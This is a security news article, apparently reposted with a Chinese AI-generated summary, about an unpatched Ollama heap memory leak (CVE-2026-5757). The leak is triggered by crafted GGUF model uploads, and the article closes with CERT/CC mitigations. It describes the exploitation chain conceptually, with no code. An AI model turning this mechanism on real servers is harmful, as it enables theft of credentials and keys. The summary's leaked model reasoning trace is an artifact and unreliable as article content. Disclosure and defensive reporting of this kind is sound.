CVE-2026-5757:Ollama 模型上传中的严重未认证堆内存泄漏漏洞
好的,我现在需要帮用户总结一篇文章的内容,控制在100字以内。首先,我得仔细阅读文章,理解其主要内容和关键点。 文章主要讲的是Ollama平台发现了一个严重的漏洞,CVE-2026-5757。这个漏洞是一个未修补的内存泄漏问题,允许未经认证的远程攻击者提取服务器堆中的敏感数据。漏洞是通过模型上传接口被利用的,攻击者上传特定的GGUF文件,触发三个软件故障,导致内存暴露。 此外,文章还提到了Ollama使用模型量化技术来压缩AI模型,但这个过程存在缺陷。攻击者可以利用这一点来窃取敏感信息如加密密钥、用户凭证等。由于开发者尚未发布补丁,管理员需要采取措施保护系统。 接下来,我需要将这些信息浓缩到100字以内。要抓住关键点:漏洞名称、影响、攻击方式、暴露的数据类型以及应对措施。 可能会这样组织语言:“Ollama平台发现严重内存泄漏漏洞(CVE-2026-5757),允许远程攻击者提取服务器堆中的敏感数据。该漏洞通过模型上传接口被利用,攻击者上传特定GGUF文件触发内存暴露。由于尚未有补丁发布,管理员需采取措施保护系统。” 这样既涵盖了主要信息又简洁明了。 </think> Ollama平台发现严重内存泄漏漏洞(CVE-2026-5757),允许远程攻击者提取服务器堆中的敏感数据。该漏洞通过模型上传接口被利用,攻击者上传特定GGUF文件触发内存暴露。由于尚未有补丁发布,管理员需采取措施保护系统。 2026-4-24 11:10:2 Author: cybersecuritynews.com(查看原文) 阅读量:0 收藏

A critical, unpatched vulnerability has been discovered in Ollama, a widely used open-source platform for running Large Language Models locally.

Tracked as CVE-2026-5757, this severe memory leak allows unauthenticated remote attackers to extract sensitive data directly from a server’s heap.

Discovered by security researcher Jeremy Brown via AI-assisted vulnerability research and disclosed publicly on April 22, 2026, the exploit targets the platform’s model upload interface.

Because the developers have not yet released a software update, administrators must actively secure their deployments to prevent unauthorized access.

AI Model Quantization Risks

Ollama is designed to help developers run resource-intensive AI models on standard hardware across Windows, macOS, and Linux.

To make this possible, the platform relies on a compression technique called model quantization, which reduces the AI model’s mathematical precision to save memory and processing power.

While highly efficient, Ollama’s quantization engine has a fatal flaw in how it handles incoming file uploads. Hackers can exploit this process by deliberately manipulating the metadata hidden inside the model files.

The attack begins when a malicious actor uploads a specially crafted GPT-Generated Unified Format (GGUF) file to the targeted server.

This upload triggers a dangerous combination of three distinct software failures that expose memory.

  • The engine skips proper bounds checking by unthinkingly trusting the file’s metadata rather than verifying that the stated element count matches the actual data size.
  • The system executes unsafe memory access using Go’s unsafe. Slice command, allowing the application to read memory far past the legitimate data buffer and into the server’s backend heap.
  • The server inadvertently writes this leaked heap data into a new model layer, creating a hidden but highly effective data exfiltration path.
  • The attacker utilizes Ollama’s built-in registry API to easily push this newly created, data-filled layer to their own external server.

Heap memory can contain highly sensitive system information, including encryption keys, user credentials, API tokens, and private user prompts.

Exposing this data can lead to complete system compromise and allow attackers to establish stealthy, long-term persistence within a corporate network.

Since the vendor was unreachable during the disclosure process, no official software patch exists to fix the underlying code flaw.

According to CERT/CC, security teams must rely on immediate defensive mitigations to protect their infrastructure.

  • Turn off the model upload functionality entirely if it is not strictly required for your daily operations.
  • Restrict upload interface access to trusted local networks and actively block all untrusted external IP addresses.
  • Accept model uploads exclusively from verified, highly trusted sources to prevent malicious files from entering your pipeline.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

Abinaya

Abinayahttps://cybersecuritynews.com/

Abi is a Security Editor and fellow reporter with Cyber Security News. She is covering various cyber security incidents happening in the Cyber Space.


文章来源: https://cybersecuritynews.com/hackers-exploit-ollama-model/
如有侵权请联系:admin#unsafe.sh